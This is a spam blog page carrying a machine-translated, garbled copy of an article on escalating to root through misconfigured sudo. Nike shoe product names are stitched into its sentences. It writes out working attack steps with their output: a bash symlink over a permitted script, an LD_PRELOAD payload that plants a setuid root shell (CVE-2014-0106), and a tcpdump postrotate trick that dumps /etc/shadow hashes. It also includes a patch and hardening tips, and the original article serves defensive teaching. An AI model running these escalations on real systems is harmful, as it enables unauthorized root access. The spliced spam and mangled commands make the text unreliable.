strangedeのブログ -12ページ目

strangedeのブログ

ブログの説明を入力します。

Overview of safety-related transaction, we often find that the server Nike Jordan Hydro 2 is configured with rights management software Nike Air Max Sudo. And other software, configure Sudo must follow the principle of least privilege, the user can be granted privileges to run the smallest possible number of necessary tasks or operations. Therefore, in order to safely configure Sudo, ordinary users permissions must be strictly limited, they can only rely on an elevated (typically root user privileges) lawfully execute a set of commands. In practical applications, according to the principle of least privilege configuration Sudo rare; even if there is, there is often little loophole, we can exploit these vulnerabilities to gain root privileges. In this case, it is finished, we can do whatever they want! This article aims to give some examples of errors and unsafe configuration, which 554988 316 Nike Zoom KD V Jade Pink White Sale we see in a production environment and safety assessment caused some impact examples. But also tell you how to make your team more easily deal with these issues. Unsafe file system permissions Consider our virtual users 'appadmin' the Sudo configuration: $ sudo -l [sudo] password for appadmin: User appadmin may run the following commands 579765-700 Sonic Air Max 2011 Womens Blue Grey Yellow / Sail - Cool Grey - Tour Yellow Nike Air Max LeBron 10 Low Sonic Yellow Online on this host: (root) / opt / Support / start .sh, (root) /opt/Support/stop.sh, (root) /opt/Support/restart.sh, (root) / usr / sbin / lsof now, it seems no problem. Then we take a look at the following script: $ ls -l / opt / Support / total 4-rwxr-xr-x 1 root root 37 Oct 3 14:06 restart.sh-rwxr-xr-x 1 appadmin appadmin 53 Oct 3 14 : 03 start.sh -ld / opt / Supportdrwxr-xr-x 2 appadmin appadmin 4096 Oct 3 13:58 privileges / opt / Support these files and directories $ ls no problem? Here, we have several options to enhance our competence: Create a file that does not exist 'stop.sh' change the file already exists 'start.sh' Move files 'restart.sh' and create another file of the same name below A third approach is to demonstrate: $ mv /opt/Support/restart.sh{,.bak}$ ln -s / bin / bash /opt/Support/restart.sh$ sudo /opt/Support/restart.sh Mens Nike Free 3.0 Wool Skin Shoes Grey Yellow [ sudo] password for appadmin:? # iduid = 0 (root) gid = 0 (root) groups = 0 (root) Game over !? :) environment variable Consider our users. 'monitor' the Sudo configuration: $ sudo -l Air Max 2011 Womens Blue Black [sudo] password for monitor: Matching Defaults entries for monitor on this host:! env_resetUser monitor may run the following commands on this host: (root) /etc/init.d/sshd we see env_reset option is disabled! This means that we can change we are allowed Mens Nike Free Run 3 Shoes Grey 3 to perform the command environment. Depending on the version of Sudo, we can enhance our competence by passing an environment variable, as the following well-known vulnerabilities as: PS4PS4 (breno) LD_PRELOAD (Kingcope or Sensepost) also need to know that some other dangerous environment variables may also be are we misuse (PERL5OPT, PYTHONINSPECT etc.). It should be noted, though, that even when env_reset is disabled, most dangerous environment variables now been Sudo default hard-coded according to the blacklist (hard-coded blacklist) deleted. Use root user to run 'sudo -V' View 'To remove the environment variable,' the blacklist. However, in versions earlier than 1.8.5 Sudo, we find the command line is passed through an environment variable will not be deleted, even though they should be removed. So we can still use and LD_PRELOAD similar techniques to enhance our competence, given below in the latest version of Red Hat Enterprise Linux 5.10 System examples (only a few of the latest security updates). $ Rpm -q sudosudo-1.7.2p1-28.el5 $ cat \u0026 gt; xoxo.c \u0026 lt; \u0026 lt; 'LUL' # include \u0026 lt; unistd.h \u0026 gt; #include \u0026 lt; stdlib.h \u0026 gt; void _init () {if ( ! geteuid ()) {unsetenv (\u0026 quot; LD_PRELOAD \u0026 quot;); unlink (\u0026 quot; /tmp/libxoxo.so.1.0\u0026quot;); setgid (0); setuid (0); execl (\u0026 quot; / bin / sh \u0026 quot ;, \u0026 quot; sh \u0026 Air Jordan Outlet quot;, \u0026 quot; -c \u0026 quot;, \u0026 quot; cp / bin / bash /tmp/.bash; chown 0: 0 /tmp/.bash; / bin / chmod + xs /tmp/.bash\u0026quot;,NULL); }} LUL $ gcc -o xoxo.o -c xoxo.c -fPIC $ gcc -shared -Wl, -soname, libxoxo.so.1 -o /tmp/libxoxo.so.1.0 xoxo.o Air Max 2011 Womens Grey Purple -nostartfiles $ sudo LD_PRELOAD = / tmp / libxoxo.so.1.0 /etc/init.d/sshd blaaah [sudo] password for monitor: $ /tmp/.bash -p -c 'id; head -n 1 / etc / shadow'uid = 500 (monitor) gid = 500 (monitor) euid = 0 (root) egid = 0 (root) groups = 500 (monitor) root: $ 1 $ VjDVB93E $ AUL2Mg1L2gH70HHxh2CEr /: 16128: 0: 99999: 7 ::: The Bug in the file sudo-1.8.4p5 / plugins / sudoers / env.c the first 685 rows, where a boolean compare operation is not performed correctly. The following patch fixes the problem: --- sudo-1.8.4p5 / plugins / sudoers / env.c 2012-03-30 04: 37: 01.000000000 +1100 +++ sudo-1.8.4p5-fixed / plugins / sudoers /env.c 2014-02-28 10: 36: 14.623915000 + 1100@@-682,7 +682,7@@okvar = matches_env_keep (* Nike Running ep);} else {okvar = matches_env_delete (* ep) == false; - if (okvar == false) + if (okvar == true) okvar = matches_env_check (* ep) = false;} if (okvar == false) {in Air Max 2011 Womens Grey Red Black Sudo 1.8.5 version, the affected code is real! On being changed and cleaned out to this 'silent' way to fix the existing problems. The result is that in 1.8.5 and above, and passed through the command line environment variable is also cleared. Note that RHEL5.10 system is still fragile, because it comes with 1.7.2p1 version (previously applied to each security patch). Similarly, RHEL 6.0 to 6.3 from a 1.7 branch compatible version. However, RHEL6.4 system would be better, because it comes with 1.8.6p3 version. We responsibly disclosed to the suppliers of these security issues, within a week, was named the vulnerability CVE-2014-0106, and announced some details, also released 1.7.10p8 security patches. Although the affected security update release development has not Nike Free 3.0 V4 Men been released, a simple solution is not to disable measures env_reset option, which is the default. Escape to shell Consider our users 'john' The Sudo configuration: $ sudo -l [sudo] password for john: User john may run the following commands on this host: (root) / usr / sbin / tcpdump in this case , john can intercept network traffic. The task itself is perfectly legal in terms of administrators, then what would be a problem? Worth a look '-z postrotate -command' (introduced in tcpdump 4.0.0 version) this option: $ echo $ 'id \\ ncat / etc / shadow' \u0026 gt; /tmp/.test$ chmod + x / tmp /. test $ sudo tcpdump -ln -i eth0 -w / dev / null -W 1 -G 1 -z /tmp/.test -Z root [sudo] password for john: tcpdump: listening on eth0, link-type EN10MB (Ethernet ), capture size 65535 bytesMaximum file limit reached: 1uid = 0 (root) gid = 0 (root) groups = 0 (root) context = unconfined_u: unconfined_r: unconfined_t: s0-s0: c0.c1023root: $ 6 $ CnflBAm.SEqAN6Rz $ rZhceJkWQlw1Dl1LaWltiT.cIhXyHtk5Ot2C7mMygrr7XBhJFzLkO8RKphzgowaYUMJHiO2MB9oBRCKFQAWoz0: 16138: 0: 99999: 7 ::: bin: *: 15980: 0: 99999: 7 ::: ... note 'Z-root' needs based on RedHat distributions (Fedora, CentOs etc.) Because they are stored before Nike Running processing the file to be patched TcpDump package to remove root privileges. So, what can you do to avoid Sudo abuse? Make sure to double-check the program to obtain permission to upgrade after each run, and they are likely to gain root privileges (a nice # prompt) directly. For example, programs like vi or less, allows the user to invoke arbitrary shell commands (with! Or similar), you should use a more secure similar procedures, rvim and cat to replace them. I want to combat this? Next there is a challenge to find out how to eject a root shell approach. There are at least two ways for our reference, but one of the more aggressive than another, can affect the integrity of the system. You can give your solutions in the comments. In order not to reduce interest, and we will announce our most primitive solution after a few weeks. System environment is a standard CentOS 6.5 system, just press the 'default' install the zip package. $ Cat /usr/local/bin/extract_docs.sh#!/bin/bashzip -U /root/original-docs.zip -O /var/lib/extracted-docs.zip \u0026 quot; $ @ \u0026 quot; $ ls -ld /root/original-docs.zip / usr / local / bin / /usr/local/bin/extract_docs.sh / var / lib / /var/lib/extracted-docs.zipls: can not access / root / original-docs. zip:.. Permission denieddrwxr-xr-x 2 root root 4096 Mar 12 17:02 / usr / local / bin / -rwxr-xr-x 1 root root 80 Mar 12 17:02 / usr / local / bin / extract_docs. shdrwxr-xr-x 15 root root 4096 Mar 12 17:02 / var / lib / -rw-r -.. r-- 1 root root 964 Mar 12 17:02 /var/lib/extracted-docs.zip$ rpm -q zipzip-3.0-1.el6.x86_64 $ sudo -l [sudo] password for kevin: Matching Defaults entries for kevin on this host: requiretty, visiblepw, always_set_home, env_reset, env_keep = \u0026 quot; COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC! KDEDIR LS_COLORS \u0026 quot ;, env_keep + = \u0026 quot; MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE \u0026 quot ;, env_keep + = \u0026 quot; LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES \u0026 quot ;, env_keep + = \u0026 quot; LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE \u0026 quot ;, env_keep + = \u0026 quot; LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY \u0026 quot; , secure_path = / sbin \\: / bin \\: / usr / sbin \\: / usr / binUser kevin may run the following commands on this host: (root) /usr/local/bin/extract_docs.sh 2015 Nike Free 5.0 Thanks for reading, and now you Come out of ideas!how I get root privileges via Sudo